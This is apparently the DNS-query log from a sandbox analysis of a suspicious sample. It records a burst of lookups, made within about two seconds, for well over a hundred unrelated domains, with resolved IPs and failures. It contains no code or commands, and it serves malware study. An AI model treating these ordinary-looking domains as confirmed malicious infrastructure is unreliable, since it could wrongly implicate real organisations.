                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.342822075 CET8.8.8.8192.168.2.50x3cd9No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.349930048 CET8.8.8.8192.168.2.50x88cfNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.353398085 CET8.8.8.8192.168.2.50x8450No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.486277103 CET8.8.8.8192.168.2.50xbe2Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.632700920 CET8.8.8.8192.168.2.50xc599No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.717053890 CET8.8.8.8192.168.2.50xd4f7No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.728099108 CET8.8.8.8192.168.2.50xc2e0No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.754446030 CET8.8.8.8192.168.2.50xdb21Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.776669979 CET8.8.8.8192.168.2.50xf0f8Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.785689116 CET8.8.8.8192.168.2.50x5150No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.785689116 CET8.8.8.8192.168.2.50x5150No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.785689116 CET8.8.8.8192.168.2.50x5150No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.785689116 CET8.8.8.8192.168.2.50x5150No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.804929972 CET8.8.8.8192.168.2.50x92a2No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.821676016 CET8.8.8.8192.168.2.50xd789No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.839418888 CET8.8.8.8192.168.2.50xf0f8Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.122828007 CET8.8.8.8192.168.2.50x8b09No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.123622894 CET8.8.8.8192.168.2.50x9891No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.123622894 CET8.8.8.8192.168.2.50x9891No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.186124086 CET8.8.8.8192.168.2.50x6304No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.186124086 CET8.8.8.8192.168.2.50x6304No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.186124086 CET8.8.8.8192.168.2.50x6304No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.186124086 CET8.8.8.8192.168.2.50x6304No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.202215910 CET8.8.8.8192.168.2.50xf9bcNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.202332973 CET8.8.8.8192.168.2.50x6236No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.251163960 CET8.8.8.8192.168.2.50xff5No error (0)onzcda.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.251163960 CET8.8.8.8192.168.2.50xff5No error (0)onzcda.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.370037079 CET8.8.8.8192.168.2.50x7b7dServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.408158064 CET8.8.8.8192.168.2.50xd37cNo error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.521418095 CET8.8.8.8192.168.2.50x23c5Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.566871881 CET8.8.8.8192.168.2.50x46fbNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.712626934 CET8.8.8.8192.168.2.50xf289No error (0)umcor.am188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.712626934 CET8.8.8.8192.168.2.50xf289No error (0)umcor.am188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.808700085 CET8.8.8.8192.168.2.50x62d3Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.841777086 CET8.8.8.8192.168.2.50x5202No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.844147921 CET8.8.8.8192.168.2.50x86ddNo error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.844147921 CET8.8.8.8192.168.2.50x86ddNo error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.844198942 CET8.8.8.8192.168.2.50xb78eNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.844418049 CET8.8.8.8192.168.2.50x6550No error (0)webways.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.844418049 CET8.8.8.8192.168.2.50x6550No error (0)webways.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.845391035 CET8.8.8.8192.168.2.50x646No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.845779896 CET8.8.8.8192.168.2.50x7a9bNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.845779896 CET8.8.8.8192.168.2.50x7a9bNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.850604057 CET8.8.8.8192.168.2.50x6808No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.855129004 CET8.8.8.8192.168.2.50x5d8No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.856599092 CET8.8.8.8192.168.2.50x7fe0No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.857319117 CET8.8.8.8192.168.2.50xef98No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.857319117 CET8.8.8.8192.168.2.50xef98No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.858022928 CET8.8.8.8192.168.2.50x60f2No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.858022928 CET8.8.8.8192.168.2.50x60f2No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.860693932 CET8.8.8.8192.168.2.50x2901No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.861187935 CET8.8.8.8192.168.2.50x4fdcNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.862592936 CET8.8.8.8192.168.2.50x422fNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.862592936 CET8.8.8.8192.168.2.50x422fNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.864687920 CET8.8.8.8192.168.2.50x2cd6No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.866394043 CET8.8.8.8192.168.2.50x1e0eNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.869652987 CET8.8.8.8192.168.2.50xfeeeNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.869744062 CET8.8.8.8192.168.2.50x132cNo error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.869744062 CET8.8.8.8192.168.2.50x132cNo error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.870974064 CET8.8.8.8192.168.2.50x4402No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.871963024 CET8.8.8.8192.168.2.50x2973No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.872684002 CET8.8.8.8192.168.2.50x13c0No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.872684002 CET8.8.8.8192.168.2.50x13c0No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.874120951 CET8.8.8.8192.168.2.50x1440No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.874120951 CET8.8.8.8192.168.2.50x1440No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.876615047 CET8.8.8.8192.168.2.50xb9b3No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.885375977 CET8.8.8.8192.168.2.50x2c0fName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.907001972 CET8.8.8.8192.168.2.50xb9f4No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.908344030 CET8.8.8.8192.168.2.50x6302No error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.909045935 CET8.8.8.8192.168.2.50x4f21No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.914314985 CET8.8.8.8192.168.2.50xc65cNo error (0)rast.se89.221.250.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.916841984 CET8.8.8.8192.168.2.50xc8f8No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.916841984 CET8.8.8.8192.168.2.50xc8f8No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.918792009 CET8.8.8.8192.168.2.50xe9afNo error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.928555965 CET8.8.8.8192.168.2.50xba84No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.929960012 CET8.8.8.8192.168.2.50x5d1fNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.933645010 CET8.8.8.8192.168.2.50x11c4Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.937923908 CET8.8.8.8192.168.2.50x5032No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.940035105 CET8.8.8.8192.168.2.50xece2No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.940084934 CET8.8.8.8192.168.2.50xf3c7No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.940257072 CET8.8.8.8192.168.2.50x6441No error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.943289042 CET8.8.8.8192.168.2.50x72f6No error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.945486069 CET8.8.8.8192.168.2.50x5245No error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.945486069 CET8.8.8.8192.168.2.50x5245No error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.947534084 CET8.8.8.8192.168.2.50xe35cNo error (0)araax.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.947534084 CET8.8.8.8192.168.2.50xe35cNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.947534084 CET8.8.8.8192.168.2.50xe35cNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.947534084 CET8.8.8.8192.168.2.50xe35cNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.947699070 CET8.8.8.8192.168.2.50x9f92No error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.947699070 CET8.8.8.8192.168.2.50x9f92No error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.948898077 CET8.8.8.8192.168.2.50xcc5bNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.950936079 CET8.8.8.8192.168.2.50x1e0fNo error (0)anduran.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.950936079 CET8.8.8.8192.168.2.50x1e0fNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.950936079 CET8.8.8.8192.168.2.50x1e0fNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.950936079 CET8.8.8.8192.168.2.50x1e0fNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.951754093 CET8.8.8.8192.168.2.50x868No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.955327034 CET8.8.8.8192.168.2.50x3e65No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.955327034 CET8.8.8.8192.168.2.50x3e65No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.955990076 CET8.8.8.8192.168.2.50x7c5fNo error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.955990076 CET8.8.8.8192.168.2.50x7c5fNo error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.956589937 CET8.8.8.8192.168.2.50x9bb3No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.960171938 CET8.8.8.8192.168.2.50xf037No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.960171938 CET8.8.8.8192.168.2.50xf037No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.960171938 CET8.8.8.8192.168.2.50xf037No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.960171938 CET8.8.8.8192.168.2.50xf037No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.962793112 CET8.8.8.8192.168.2.50x5652No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.965722084 CET8.8.8.8192.168.2.50x88c9No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.966236115 CET8.8.8.8192.168.2.50xee97No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.967245102 CET8.8.8.8192.168.2.50xc85dNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.981441975 CET8.8.8.8192.168.2.50x3de9Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.984989882 CET8.8.8.8192.168.2.50xa2a2No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.986886978 CET8.8.8.8192.168.2.50xab1No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.006587029 CET8.8.8.8192.168.2.50x5ef6No error (0)bd-style.com107.165.223.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.039721966 CET8.8.8.8192.168.2.50xc9d4No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.039721966 CET8.8.8.8192.168.2.50xc9d4No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.039764881 CET8.8.8.8192.168.2.50x470bNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.039764881 CET8.8.8.8192.168.2.50x470bNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.039764881 CET8.8.8.8192.168.2.50x470bNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.039764881 CET8.8.8.8192.168.2.50x470bNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.042257071 CET8.8.8.8192.168.2.50xe6f9Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.049902916 CET8.8.8.8192.168.2.50x8dbfNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.049902916 CET8.8.8.8192.168.2.50x8dbfNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.051263094 CET8.8.8.8192.168.2.50x8382No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.060508013 CET8.8.8.8192.168.2.50x5681No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.061763048 CET8.8.8.8192.168.2.50xe1cfNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.061763048 CET8.8.8.8192.168.2.50xe1cfNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.061763048 CET8.8.8.8192.168.2.50xe1cfNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.063622952 CET8.8.8.8192.168.2.50x9c8cName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.063750982 CET8.8.8.8192.168.2.50xf802Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.068799019 CET8.8.8.8192.168.2.50x3a2fNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.068799019 CET8.8.8.8192.168.2.50x3a2fNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.072109938 CET8.8.8.8192.168.2.50x7a77No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.091379881 CET8.8.8.8192.168.2.50x45e0No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.091414928 CET8.8.8.8192.168.2.50xe1c8No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.091842890 CET8.8.8.8192.168.2.50x26bcServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.092808962 CET8.8.8.8192.168.2.50x6c2bNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.092847109 CET8.8.8.8192.168.2.50xbad8Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.095038891 CET8.8.8.8192.168.2.50x6eb2No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.104700089 CET8.8.8.8192.168.2.50x639bNo error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.109023094 CET8.8.8.8192.168.2.50xa077No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.109443903 CET8.8.8.8192.168.2.50x8b6dNo error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.112377882 CET8.8.8.8192.168.2.50x29a8Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.122767925 CET8.8.8.8192.168.2.50xcb0aName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.126619101 CET8.8.8.8192.168.2.50x4ff0No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.131221056 CET8.8.8.8192.168.2.50xbd33No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.131221056 CET8.8.8.8192.168.2.50xbd33No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.131221056 CET8.8.8.8192.168.2.50xbd33No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.133501053 CET8.8.8.8192.168.2.50x6a2fNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.134584904 CET8.8.8.8192.168.2.50x6233No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.139033079 CET8.8.8.8192.168.2.50x2bdeNo error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.144808054 CET8.8.8.8192.168.2.50xd1c8No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.146037102 CET8.8.8.8192.168.2.50xaf30No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.146037102 CET8.8.8.8192.168.2.50xaf30No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.148658037 CET8.8.8.8192.168.2.50x837aNo error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.154437065 CET8.8.8.8192.168.2.50x1dbServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.178008080 CET8.8.8.8192.168.2.50xa6c1No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
